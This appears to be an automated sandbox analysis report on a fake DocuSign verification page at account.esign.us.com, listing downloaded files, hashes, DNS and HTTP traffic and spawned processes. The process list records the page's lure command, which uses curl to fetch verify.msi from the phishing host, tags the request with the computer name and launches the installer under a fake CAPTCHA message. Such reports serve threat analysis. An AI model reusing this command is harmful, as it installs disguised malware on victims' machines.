                              SHA-512:5FFA6237B623773473398727CCE9FFAD83488127A61DB84D5F2596A52E3643C78768CFDF9706BF25F9118A91DECA5711ACB7DCE5AE5C03176D683A305C1580E8
                              Malicious:false
                              Reputation:low
                              URL:https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF
                              Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Docusign - Verification</title>.. <link rel="icon" type="image/x-icon" href="data:image/x-icon;base64,
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with no line terminators
                              Category:downloaded
                              Size (bytes):52
                              Entropy (8bit):4.5395834108987785
                              Encrypted:false
                              SSDEEP:3:OdCd/ZoSb9inuSISHmn:OdCd/ZoSb99Sfmn
                              MD5:E5ABEC1C9A505AC76B6AA29071ED1082
                              SHA1:9B3D310EAC34E7C05270AD5E902A077019B7D317
                              SHA-256:5F1331C24E99130BEBFCAC9910702F8D560DD09A639E3C29901402FE19A64D0E
                              SHA-512:D1C91772CB0DBA86C4D264963694BD05ED3B4E16C70A3EC66508F35F7257D4932A5D917B6CEA40FB8F1A5084510FC1CE314DD604991FCEDCA1BDEA4B831A0B33
                              Malicious:false
                              Reputation:low
                              URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIuCYHyZX_ZHdoAEgUNoV9LmxIFDZFhlU4SBQ2UkJL6EgUNBu27_yHmEUAwvElXuA==?alt=proto
                              Preview:CiQKBw2hX0ubGgAKBw2RYZVOGgAKBw2UkJL6GgAKBw0G7bv/GgA=
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (20712)
                              Category:downloaded
                              Size (bytes):20713
                              Entropy (8bit):5.053868437066879
                              Encrypted:false
                              SSDEEP:192:CBh5Cif2IgOmgOua1YldXaugk7OyC7AL2DSYy3epAd/3nsTeUxX:CB72InJaq+ROOyC7AN3Mu/XsTeUxX
                              MD5:53EF696D417D353EFBD07C105F694756
                              SHA1:F37FBCF88F577F3152B8EC113D83B843DC6E2BC8
                              SHA-256:B166631D0898F5FBE179400EA31AECCF0F56A61977CEA7D56B3D6464A12FA2DF
                              SHA-512:36FB911A53DFE9C1E9C50A811A73DEEDF3E8002A72AE386548D79755463B059023D67361B8DA5106ADE8B02E32AF6BECC1412E1EAD87B42B18DAF7CB3429DD60
                              Malicious:false
                              Reputation:low
                              URL:https://cdn.jsdelivr.net/npm/sweetalert2@11.6.15/dist/sweetalert2.min.css
                              Preview:.swal2-popup.swal2-toast{box-sizing:border-box;grid-column:1/4 !important;grid-row:1/4 !important;grid-template-columns:min-content auto min-content;padding:1em;overflow-y:hidden;background:#fff;box-shadow:0 0 1px rgba(0,0,0,.075),0 1px 2px rgba(0,0,0,.075),1px 2px 4px rgba(0,0,0,.075),1px 3px 8px rgba(0,0,0,.075),2px 4px 16px rgba(0,0,0,.075);pointer-events:all}.swal2-popup.swal2-toast>*{grid-column:2}.swal2-popup.swal2-toast .swal2-title{margin:.5em 1em;padding:0;font-size:1em;text-align:initial}.swal2-popup.swal2-toast .swal2-loading{justify-content:center}.swal2-popup.swal2-toast .swal2-input{height:2em;margin:.5em;font-size:1em}.swal2-popup.swal2-toast .swal2-validation-message{font-size:1em}.swal2-popup.swal2-toast .swal2-footer{margin:.5em 0 0;padding:.5em 0 0;font-size:.8em}.swal2-popup.swal2-toast .swal2-close{grid-column:3/3;grid-row:1/99;align-self:center;width:.8em;height:.8em;margin:0;font-size:2em}.swal2-popup.swal2-toast .swal2-html-container{margin:.5em 1em;padding:0;ov
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                              Category:dropped
                              Size (bytes):2228
                              Entropy (8bit):7.82817506159911
                              Encrypted:false
                              SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                              MD5:EF9941290C50CD3866E2BA6B793F010D
                              SHA1:4736508C795667DCEA21F8D864233031223B7832
                              SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                              SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                              Malicious:false
                              Reputation:low
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 25 x 25, 8-bit gray+alpha, non-interlaced
                              Category:dropped
                              Size (bytes):462
                              Entropy (8bit):6.832834205355095
                              Encrypted:false
                              SSDEEP:12:6v/7ECUPfn6mCx9OOsTNmNLw8h6/KzSkCt1RKEM0Ht1B:xPiA1Z8h6yzRqWEMEr
                              MD5:3116E1AF6C57317209879BED595ACE28
                              SHA1:DB24192BD54896DA5994A8507942FA80A4427185
                              SHA-256:894EFF46E7DE96D535594F704E544C8B95F0956285AE535FCB9985D5C9996544
                              SHA-512:68108788CFE930A64BF38D19BA02FBFE271E37AD0FD21EC7939DC10BA10BBD3AA9029627506A140E55012A46C8931BDEF94C7FEB93F513F2B4A65F61C5A33AF8
                              Malicious:false
                              Reputation:low
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 646 x 250, 8-bit colormap, non-interlaced
                              Category:dropped
                              Size (bytes):4904
                              Entropy (8bit):7.899029446643728
                              Encrypted:false
                              SSDEEP:96:OdBnjzG7DZTxqIfy33nn/qf46vhPQuAgul5SZBsj51v1f:OdBnjwDZTx5fy33no4ShRjuX2sd1vt
                              MD5:1E91D02CF5A902F38F2923C006D79281
                              SHA1:CB8126B32C2274E0394246B40BD0B7F9F847E44C
                              SHA-256:F72611E2DF8E88204009FD896D05D5E8E83C77009C63943BBFFA169559934849
                              SHA-512:54B69544DC55ADDC0B2DDC08418D1A0A34240697070FE47FEAE9E915C70D33EF662CE1B7154CBCAD84019D22F3291F138CC7298224D381CC740C2097478D4042
                              Malicious:false
                              Reputation:low
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 646 x 250, 8-bit colormap, non-interlaced
                              Category:downloaded
                              Size (bytes):4904
                              Entropy (8bit):7.899029446643728
                              Encrypted:false
                              SSDEEP:96:OdBnjzG7DZTxqIfy33nn/qf46vhPQuAgul5SZBsj51v1f:OdBnjwDZTx5fy33no4ShRjuX2sd1vt
                              MD5:1E91D02CF5A902F38F2923C006D79281
                              SHA1:CB8126B32C2274E0394246B40BD0B7F9F847E44C
                              SHA-256:F72611E2DF8E88204009FD896D05D5E8E83C77009C63943BBFFA169559934849
                              SHA-512:54B69544DC55ADDC0B2DDC08418D1A0A34240697070FE47FEAE9E915C70D33EF662CE1B7154CBCAD84019D22F3291F138CC7298224D381CC740C2097478D4042
                              Malicious:false
                              Reputation:low
                              URL:https://play.google.com/intl/en_us/badges/static/images/badges/en_badge_web_generic.png
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 25 x 25, 8-bit gray+alpha, non-interlaced
                              Category:downloaded
                              Size (bytes):462
                              Entropy (8bit):6.832834205355095
                              Encrypted:false
                              SSDEEP:12:6v/7ECUPfn6mCx9OOsTNmNLw8h6/KzSkCt1RKEM0Ht1B:xPiA1Z8h6yzRqWEMEr
                              MD5:3116E1AF6C57317209879BED595ACE28
                              SHA1:DB24192BD54896DA5994A8507942FA80A4427185
                              SHA-256:894EFF46E7DE96D535594F704E544C8B95F0956285AE535FCB9985D5C9996544
                              SHA-512:68108788CFE930A64BF38D19BA02FBFE271E37AD0FD21EC7939DC10BA10BBD3AA9029627506A140E55012A46C8931BDEF94C7FEB93F513F2B4A65F61C5A33AF8
                              Malicious:false
                              Reputation:low
                              URL:https://upload.wikimedia.org/wikipedia/commons/thumb/2/2b/Windows_logo_2012-Black.svg/25px-Windows_logo_2012-Black.svg.png
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (43300)
                              Category:downloaded
                              Size (bytes):43365
                              Entropy (8bit):5.248811076277145
                              Encrypted:false
                              SSDEEP:768:WPbVoLscD1xXIIe6oOlCczwCF9av8Bm58uD7hWuUewNlaAU1GV1pUrxvXELQe2S7:QomIjigMb7h4lKiOGaLxm1m9Bk
                              MD5:3042F5F45C2338989497F11F1E4813D8
                              SHA1:6D018A5F343991F4CBFDC5BA18B429787D1BF1C5
                              SHA-256:EF23C3CAE3EDA672437471D564F354F2C93E9BBA47D4F789DB501C48DA758F3B
                              SHA-512:6784183527360C5BFC2EB84C1326AB10FDEB0643830594FDD11C140BB758418176F55E1D7E487EF286191EDD11E93DFF28DBF7DBFBB45BA89C19651493D5748C
                              Malicious:false
                              Reputation:low
                              URL:https://cdn.jsdelivr.net/npm/sweetalert2@11.6.15/dist/sweetalert2.min.js
                              Preview:/*!.* sweetalert2 v11.6.15.* Released under the MIT License..*/.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).Sweetalert2=t()}(this,(function(){"use strict";var e={awaitingPromise:new WeakMap,promise:new WeakMap,innerParams:new WeakMap,domCache:new WeakMap};const t=e=>{const t={};for(const n in e)t[e[n]]="swal2-"+e[n];return t},n=t(["container","shown","height-auto","iosfix","popup","modal","no-backdrop","no-transition","toast","toast-shown","show","hide","close","title","html-container","actions","confirm","deny","cancel","default-outline","footer","icon","icon-content","image","input","file","range","select","radio","checkbox","label","textarea","inputerror","input-label","validation-message","progress-steps","active-progress-step","progress-step","progress-step-line","loader","loading","styled","top","top-start","top-end","top-left","top-righ
                              No static file info
                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                              Mar 21, 2025 18:44:27.924280882 CET | 192.168.2.6 | 1.1.1.1 | 0x6834 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
                              Mar 21, 2025 18:44:27.924544096 CET | 192.168.2.6 | 1.1.1.1 | 0x8e77 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
                              Mar 21, 2025 18:44:29.010727882 CET | 192.168.2.6 | 1.1.1.1 | 0x65ff | Standard query (0) | account.esign.us.com | A (IP address) | IN (0x0001) | false
                              Mar 21, 2025 18:44:29.013665915 CET | 192.168.2.6 | 1.1.1.1 | 0x8caa | Standard query (0) | account.esign.us.com | 65 | IN (0x0001) | false
                              Mar 21, 2025 18:44:29.701042891 CET | 192.168.2.6 | 1.1.1.1 | 0xaf74 | Standard query (0) | cdn.jsdelivr.net | A (IP address) | IN (0x0001) | false
                              Mar 21, 2025 18:44:29.701426029 CET | 192.168.2.6 | 1.1.1.1 | 0x6ac9 | Standard query (0) | cdn.jsdelivr.net | 65 | IN (0x0001) | false
                              Mar 21, 2025 18:44:30.084924936 CET | 192.168.2.6 | 1.1.1.1 | 0x12e1 | Standard query (0) | play.google.com | A (IP address) | IN (0x0001) | false
                              Mar 21, 2025 18:44:30.085071087 CET | 192.168.2.6 | 1.1.1.1 | 0x443d | Standard query (0) | play.google.com | 65 | IN (0x0001) | false
                              Mar 21, 2025 18:44:30.592247009 CET | 192.168.2.6 | 1.1.1.1 | 0xc715 | Standard query (0) | play.google.com | A (IP address) | IN (0x0001) | false
                              Mar 21, 2025 18:44:30.592390060 CET | 192.168.2.6 | 1.1.1.1 | 0x51a7 | Standard query (0) | play.google.com | 65 | IN (0x0001) | false
                              Mar 21, 2025 18:44:42.969039917 CET | 192.168.2.6 | 1.1.1.1 | 0xf02b | Standard query (0) | upload.wikimedia.org | A (IP address) | IN (0x0001) | false
                              Mar 21, 2025 18:44:42.969244003 CET | 192.168.2.6 | 1.1.1.1 | 0x9b1d | Standard query (0) | upload.wikimedia.org | 65 | IN (0x0001) | false
                              Mar 21, 2025 18:44:43.436299086 CET | 192.168.2.6 | 1.1.1.1 | 0x6512 | Standard query (0) | account.esign.us.com | A (IP address) | IN (0x0001) | false
                              Mar 21, 2025 18:44:43.591180086 CET | 192.168.2.6 | 1.1.1.1 | 0x6ad0 | Standard query (0) | upload.wikimedia.org | A (IP address) | IN (0x0001) | false
                              Mar 21, 2025 18:44:43.591464996 CET | 192.168.2.6 | 1.1.1.1 | 0xf021 | Standard query (0) | upload.wikimedia.org | 65 | IN (0x0001) | false
                              Mar 21, 2025 18:44:56.329937935 CET | 192.168.2.6 | 1.1.1.1 | 0x916e | Standard query (0) | account.esign.us.com | A (IP address) | IN (0x0001) | false
                              Mar 21, 2025 18:45:32.427767038 CET | 192.168.2.6 | 1.1.1.1 | 0x7350 | Standard query (0) | google.com | A (IP address) | IN (0x0001) | false
                              Mar 21, 2025 18:45:32.427902937 CET | 192.168.2.6 | 1.1.1.1 | 0xf418 | Standard query (0) | google.com | 65 | IN (0x0001) | false
                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                              Mar 21, 2025 18:44:28.030550003 CET | 1.1.1.1 | 192.168.2.6 | 0x8e77 | No error (0) | www.google.com |  |  | 65 | IN (0x0001) | false
                              Mar 21, 2025 18:44:28.030592918 CET | 1.1.1.1 | 192.168.2.6 | 0x6834 | No error (0) | www.google.com |  | 142.251.40.196 | A (IP address) | IN (0x0001) | false
                              Mar 21, 2025 18:44:29.140876055 CET | 1.1.1.1 | 192.168.2.6 | 0x65ff | No error (0) | account.esign.us.com |  | 44.203.127.19 | A (IP address) | IN (0x0001) | false
                              Mar 21, 2025 18:44:29.802022934 CET | 1.1.1.1 | 192.168.2.6 | 0x6ac9 | No error (0) | cdn.jsdelivr.net | jsdelivr.map.fastly.net |  | CNAME (Canonical name) | IN (0x0001) | false
                              Mar 21, 2025 18:44:29.803500891 CET | 1.1.1.1 | 192.168.2.6 | 0xaf74 | No error (0) | cdn.jsdelivr.net | jsdelivr.map.fastly.net |  | CNAME (Canonical name) | IN (0x0001) | false
                              Mar 21, 2025 18:44:29.803500891 CET | 1.1.1.1 | 192.168.2.6 | 0xaf74 | No error (0) | jsdelivr.map.fastly.net |  | 151.101.193.229 | A (IP address) | IN (0x0001) | false
                              Mar 21, 2025 18:44:29.803500891 CET | 1.1.1.1 | 192.168.2.6 | 0xaf74 | No error (0) | jsdelivr.map.fastly.net |  | 151.101.129.229 | A (IP address) | IN (0x0001) | false
                              Mar 21, 2025 18:44:29.803500891 CET | 1.1.1.1 | 192.168.2.6 | 0xaf74 | No error (0) | jsdelivr.map.fastly.net |  | 151.101.65.229 | A (IP address) | IN (0x0001) | false
                              Mar 21, 2025 18:44:29.803500891 CET | 1.1.1.1 | 192.168.2.6 | 0xaf74 | No error (0) | jsdelivr.map.fastly.net |  | 151.101.1.229 | A (IP address) | IN (0x0001) | false
                              Mar 21, 2025 18:44:30.186463118 CET | 1.1.1.1 | 192.168.2.6 | 0x12e1 | No error (0) | play.google.com |  | 172.217.165.142 | A (IP address) | IN (0x0001) | false
                              Mar 21, 2025 18:44:30.692590952 CET | 1.1.1.1 | 192.168.2.6 | 0xc715 | No error (0) | play.google.com |  | 142.251.40.142 | A (IP address) | IN (0x0001) | false
                              Mar 21, 2025 18:44:43.109517097 CET | 1.1.1.1 | 192.168.2.6 | 0xf02b | No error (0) | upload.wikimedia.org |  | 208.80.154.240 | A (IP address) | IN (0x0001) | false
                              Mar 21, 2025 18:44:43.569705009 CET | 1.1.1.1 | 192.168.2.6 | 0x6512 | No error (0) | account.esign.us.com |  | 44.203.127.19 | A (IP address) | IN (0x0001) | false
                              Mar 21, 2025 18:44:43.698257923 CET | 1.1.1.1 | 192.168.2.6 | 0x6ad0 | No error (0) | upload.wikimedia.org |  | 208.80.154.240 | A (IP address) | IN (0x0001) | false
                              Mar 21, 2025 18:44:56.478513002 CET | 1.1.1.1 | 192.168.2.6 | 0x916e | No error (0) | account.esign.us.com |  | 44.203.127.19 | A (IP address) | IN (0x0001) | false
                              Mar 21, 2025 18:45:32.533251047 CET | 1.1.1.1 | 192.168.2.6 | 0x7350 | No error (0) | google.com |  | 142.251.40.238 | A (IP address) | IN (0x0001) | false
                              Mar 21, 2025 18:45:32.535382032 CET | 1.1.1.1 | 192.168.2.6 | 0xf418 | No error (0) | google.com |  |  | 65 | IN (0x0001) | false
                              • account.esign.us.com
                                • cdn.jsdelivr.net
                                • play.google.com
                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              0 | 192.168.2.6 | 49701 | 44.203.127.19 | 443 | 4564 | C:\Program Files\Google\Chrome\Application\chrome.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2025-03-21 17:44:29 UTC | 711 | OUT | GET /documentWizard.html?Uv=4WaUN2Pkric74yNetF HTTP/1.1
                              Host: account.esign.us.com
                              Connection: keep-alive
                              sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                              sec-ch-ua-mobile: ?0
                              sec-ch-ua-platform: "Windows"
                              Upgrade-Insecure-Requests: 1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: navigate
                              Sec-Fetch-User: ?1
                              Sec-Fetch-Dest: document
                              Accept-Encoding: gzip, deflate, br, zstd
                              Accept-Language: en-US,en;q=0.9
                              2025-03-21 17:44:29 UTC | 247 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.24.0 (Ubuntu)
                              Date: Fri, 21 Mar 2025 17:44:29 GMT
                              Content-Type: text/html
                              Content-Length: 287196
                              Last-Modified: Thu, 13 Mar 2025 03:35:46 GMT
                              Connection: close
                              ETag: "67d25292-461dc"
                              Accept-Ranges: bytes
                              2025-03-21 17:44:29 UTC | 16137 | IN | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Docusign - Verification</title> <link rel="icon" type="image/x-icon" href="data:image/x-icon


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              1 | 192.168.2.6 | 49706 | 151.101.193.229 | 443 | 4564 | C:\Program Files\Google\Chrome\Application\chrome.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2025-03-21 17:44:30 UTC | 623 | OUT | GET /npm/sweetalert2@11.6.15/dist/sweetalert2.min.css HTTP/1.1
                              Host: cdn.jsdelivr.net
                              Connection: keep-alive
                              sec-ch-ua-platform: "Windows"
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                              sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                              sec-ch-ua-mobile: ?0
                              Accept: text/css,*/*;q=0.1
                              Sec-Fetch-Site: cross-site
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: style
                              Sec-Fetch-Storage-Access: active
                              Referer: https://account.esign.us.com/
                              Accept-Encoding: gzip, deflate, br, zstd
                              Accept-Language: en-US,en;q=0.9
                              2025-03-21 17:44:30 UTC | 755 | IN | HTTP/1.1 200 OK
                              Connection: close
                              Content-Length: 20713
                              Access-Control-Allow-Origin: *
                              Access-Control-Expose-Headers: *
                              Timing-Allow-Origin: *
                              Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
                              Cross-Origin-Resource-Policy: cross-origin
                              X-Content-Type-Options: nosniff
                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                              Content-Type: text/css; charset=utf-8
                              X-JSD-Version: 11.6.15
                              X-JSD-Version-Type: version
                              ETag: W/"50e9-83+8+I9XfzFSuOwRPYO4Q9xuK8g"
                              Accept-Ranges: bytes
                              Age: 85300
                              Date: Fri, 21 Mar 2025 17:44:30 GMT
                              X-Served-By: cache-fra-eddf8230137-FRA, cache-lga21927-LGA
                              X-Cache: HIT, MISS
                              Vary: Accept-Encoding
                              alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              2 | 192.168.2.6 | 49707 | 151.101.193.229 | 443 | 4564 | C:\Program Files\Google\Chrome\Application\chrome.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2025-03-21 17:44:30 UTC | 608 | OUT | GET /npm/sweetalert2@11.6.15/dist/sweetalert2.min.js HTTP/1.1
                              Host: cdn.jsdelivr.net
                              Connection: keep-alive
                              sec-ch-ua-platform: "Windows"
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                              sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                              sec-ch-ua-mobile: ?0
                              Accept: */*
                              Sec-Fetch-Site: cross-site
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: script
                              Sec-Fetch-Storage-Access: active
                              Referer: https://account.esign.us.com/
                              Accept-Encoding: gzip, deflate, br, zstd
                              Accept-Language: en-US,en;q=0.9
                              2025-03-21 17:44:30 UTC  770                IN         HTTP/1.1 200 OK
                              Connection: close
                              Content-Length: 43365
                              Access-Control-Allow-Origin: *
                              Access-Control-Expose-Headers: *
                              Timing-Allow-Origin: *
                              Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
                              Cross-Origin-Resource-Policy: cross-origin
                              X-Content-Type-Options: nosniff
                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                              Content-Type: application/javascript; charset=utf-8
                              X-JSD-Version: 11.6.15
                              X-JSD-Version-Type: version
                              ETag: W/"a965-bQGKXzQ5kfTL/cW6GLQpeH0b8cU"
                              Accept-Ranges: bytes
                              Age: 874264
                              Date: Fri, 21 Mar 2025 17:44:30 GMT
                              X-Served-By: cache-fra-eddf8230056-FRA, cache-lga21941-LGA
                              X-Cache: HIT, MISS
                              Vary: Accept-Encoding
                              alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400


                              Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                              3           192.168.2.6  49709        172.217.165.142  443               4564  C:\Program Files\Google\Chrome\Application\chrome.exe
                              Timestamp                Bytes transferred  Direction  Data
                              2025-03-21 17:44:30 UTC  708                OUT        GET /intl/en_us/badges/static/images/badges/en_badge_web_generic.png HTTP/1.1
                              Host: play.google.com
                              Connection: keep-alive
                              sec-ch-ua-platform: "Windows"
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                              sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                              sec-ch-ua-mobile: ?0
                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                              X-Client-Data: CO6MywE=
                              Sec-Fetch-Site: cross-site
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: image
                              Sec-Fetch-Storage-Access: active
                              Referer: https://account.esign.us.com/
                              Accept-Encoding: gzip, deflate, br, zstd
                              Accept-Language: en-US,en;q=0.9
                              2025-03-21 17:44:30 UTC  831                IN         HTTP/1.1 200 OK
                              Accept-Ranges: bytes
                              Content-Type: image/png
                              Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/uxe-owners-acl/play_google
                              Cross-Origin-Resource-Policy: cross-origin
                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="uxe-owners-acl/play_google"
                              Report-To: {"group":"uxe-owners-acl/play_google","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/uxe-owners-acl/play_google"}]}
                              Content-Length: 4904
                              Date: Fri, 21 Mar 2025 17:44:30 GMT
                              Expires: Fri, 21 Mar 2025 17:44:30 GMT
                              Cache-Control: private, max-age=0
                              Last-Modified: Thu, 04 Aug 2022 06:08:00 GMT
                              X-Content-Type-Options: nosniff
                              Server: sffe
                              X-XSS-Protection: 0
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Connection: close



                              Target ID:2
                              Start time:13:44:16
                              Start date:21/03/2025
                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                              Imagebase:0x7ff63b000000
                              File size:3'388'000 bytes
                              MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              Target ID:3
                              Start time:13:44:22
                              Start date:21/03/2025
                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1768,i,13563723301119555575,7756311842140240896,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2148 /prefetch:3
                              Imagebase:0x7ff63b000000
                              File size:3'388'000 bytes
                              MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              Target ID:12
                              Start time:13:44:27
                              Start date:21/03/2025
                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF"
                              Imagebase:0x7ff63b000000
                              File size:3'388'000 bytes
                              MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              Target ID:14
                              Start time:13:44:42
                              Start date:21/03/2025
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd /K cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: %computername%" -o %userprofile%\verify.msi && start %userprofile%\verify.msi && echo CAPTCHA Code: 033561 && pause && rem DocuSign CAPTCHA Verification Tool (ver. 2025.1022)
                              Imagebase:0x2a0000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              Target ID:15
                              Start time:13:44:42
                              Start date:21/03/2025
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff68dae0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              Target ID:16
                              Start time:13:44:42
                              Start date:21/03/2025
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd.exe /c curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi
                              Imagebase:0x2a0000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              Target ID:17
                              Start time:13:44:42
                              Start date:21/03/2025
                              Path:C:\Windows\SysWOW64\curl.exe
                              Wow64 process (32bit):true
                              Commandline:curl.exe -s https://account.esign.us.com/user-verify -H "x-system-id: user-PC" -o C:\Users\user\verify.msi
                              Imagebase:0xfb0000
                              File size:470'528 bytes
                              MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              No disassembly